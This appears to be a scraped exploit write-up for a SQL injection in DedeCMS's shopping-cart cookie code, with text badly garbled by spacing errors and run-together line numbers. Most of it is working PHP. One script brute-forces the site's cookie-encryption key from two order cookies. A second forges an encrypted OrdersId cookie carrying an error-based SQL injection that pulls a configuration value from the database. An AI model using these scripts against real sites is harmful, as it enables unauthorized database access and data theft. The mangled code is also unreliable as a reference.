Dedecms (zhimeng) shopcar. class. php SQL Injection

In include/shopcar. class. php first checks how the shopcar class generates the 239 function saveCookie ($ key, $ value) 240 {241 if (is_array ($ value) of the cookie )) 242 {243 $ value = $ this-> enCrypt ($ this-> enCode ($ value )); 244} 245 else 246 {247 $ value = $ this-> enCrypt ($ value); 248} 249 setcookie ($ key, $ value, time () + 36000, '/'); 250} simply put, $ key is the cookie key, and value is the value, enCode is used to convert the array type to a = yy & B = cc & d = know. The key is the enCrypt function 186 function enCr. Ypt ($ txt) 187 {188 srand (double) microtime () * 1000000); 189 $ encrypt_key = md5 (rand (0, 32000); 190 $ ctr = 0; 191 $ tmp = ''; 192 for ($ I = 0; $ I <strlen ($ txt); $ I ++) 193 {194 $ ctr = strlen ($ encrypt_key )? 0: $ ctr; 195 $ tmp. = $ encrypt_key [$ ctr]. ($ txt [$ I] ^ $ encrypt_key [$ ctr ++]); 196} 197 return base64_encode ($ this-> setKey ($ tmp )); 198} 213 function setKey ($ txt) 214 {215 global $ export _cookie_encode; 216 $ encrypt_key = md5 (strtolower ($ export _cookie_encode); 217 $ ctr = 0; 218 $ tmp = ''; 219 for ($ I = 0; $ I <strlen ($ txt); $ I ++) 220 {221 $ ctr = strlen ($ encrypt_key )? 0: $ ctr; 222 $ tmp. = $ txt [$ I] ^ $ encrypt_key [$ ctr ++]; 223} 224 return $ tmp; 225} the parameter $ txt of enCrypt is known, the returned value is the cookie value, which is also known and then the $ tmp parameter when enCrypt calls setKey. In a sense, this parameter is also known, because $ encrypt_key = md5 (rand (0, 32000); there are only 32000 possibilities, we can introduce 32000 possibilities $ tmp, so we can introduce 32000 possible md5 (strtolower ($ javas_cookie_encode). By the way, we forgot to say that our purpose is to deduce the value of $ encrypt_key in setKey, then, the shopping cart cookies can be constructed at will. The 32000 md5 (strtolower ($ pai_cookie_encode) types are introduced, which is simple. Filter out keys that are not alphanumeric, and there are only a few hundred possible keys left. Then, we can obtain hundreds of possible keys from the next order, and then take the intersection, obtain the final key. The Code is as follows: <? Php $ cookie1 = "Recipe ="; // here is the first cookie, change here $ cookie2 = "Recipe ="; // here is the second cookie, change here $ plantxt = "id = 2 & price = 0 & units = Fun & buynum = 1 & title = naduohua1 "; // here is the text, change here function reStrCode ($ code, $ string) {$ code = base64_decode ($ code ); $ key = ""; for ($ I = 0; $ I <32; $ I ++) {$ key. = $ string [$ I] ^ $ code [$ I];} return $ key;} www.2cto. comfunction getKeys ($ cookie, $ plantxt) {$ tmp = $ cookie; $ results = array (); for ($ j = 0; $ j <32000; $ j ++) {$ txt = $ plantxt; $ ctr = 0; $ tmp = ''; $ encrypt_key = md5 ($ j); for ($ I = 0; $ I <strlen ($ txt); $ I ++) {$ ctr = strlen ($ encrypt_key )? 0: $ ctr; $ tmp. = $ encrypt_key [$ ctr]. ($ txt [$ I] ^ $ encrypt_key [$ ctr ++]);} $ string = $ tmp; $ code = $ cookie; $ result = reStrCode ($ code, $ string); if (eregi ('^ [a-z0-9] + $', $ result) {echo $ result. "\ n"; $ results [] = $ result ;}return $ results ;}$ results1 = getKeys ($ cookie1, $ plantxt); $ results2 = getKeys ($ cookie2, $ plantxt); print "\ n -------------------- real key -------------------------- \ n"; foreach ($ res Ults1 as $ test1) {foreach ($ results2 as $ test2) {if ($ test1 ==$ test2) {echo $ test1. "\ n" ;}}?> Cookie1 and cookie2 are the cookies generated after I place two orders respectively. plantxt can be calculated based on the page, which is probably in this format: id = 2 & price = 0 & units = fun & buynum = 1 & title = naduohua1, we can construct a cookie for any shopping cart and then see 20 class MemberShops 21 {22 var $ OrdersId; 23 var $ productsId; 24 25 function _ construct () 26 {27 $ this-> OrdersId = $ this-> getCookie ("OrdersId"); 28 if (empty ($ this-> OrdersId )) 29 {30 $ this-> OrdersId = $ this-> Mak EOrders (); 31} 32} found that OrderId is obtained from the cookie and then/plus/carbuyaction. 29 $ cart = new MemberShops (); 39 $ OrdersId = $ cart-> OrdersId; // The Order Number of this record ...... 173 $ rows = $ dsql-> GetOne ("SELECT 'id' FROM dede_shops_orders WHERE oid = '$ OrdersId' LIMIT 0, 1 "); then we can inject the following code to generate a cookie: <? Php $ txt = "1 'or 1 = @' \'' and (SELECT 1 FROM (select count (*), concat (floor (rand (0) * 2 ), (substring (select value from dede_sysconfig where aid = 3), 1, 62) a from information_schema.tables group by a) B) or 1 = @ '\ ''or '1' = '1"; $ encrypt_key = "9f09293b7419ed68448fb51d5b174834"; // here is the key, please change here function setKey ($ txt) {global $ encrypt_key; $ ctr = 0; $ tmp = ''; for ($ I = 0; $ I <strlen ($ Txt); $ I ++) {$ ctr = strlen ($ encrypt_key )? 0: $ ctr; $ tmp. = $ txt [$ I] ^ $ encrypt_key [$ ctr ++];} return $ tmp;} function enCrypt ($ txt) {srand (double) microtime () * 1000000); $ encrypt_key = md5 (rand (0, 32000); $ ctr = 0; $ tmp = ''; for ($ I = 0; $ I <strlen ($ txt); $ I ++) {$ ctr = strlen ($ encrypt_key )? 0: $ ctr; $ tmp. = $ encrypt_key [$ ctr]. ($ txt [$ I] ^ $ encrypt_key [$ ctr ++]);} return base64_encode (setKey ($ tmp);} for ($ dest = 0; $ dest = enCrypt ($ txt);) {if (! Strpos ($ dest, '+') {break ;}} echo $ dest. "\ n" ;?>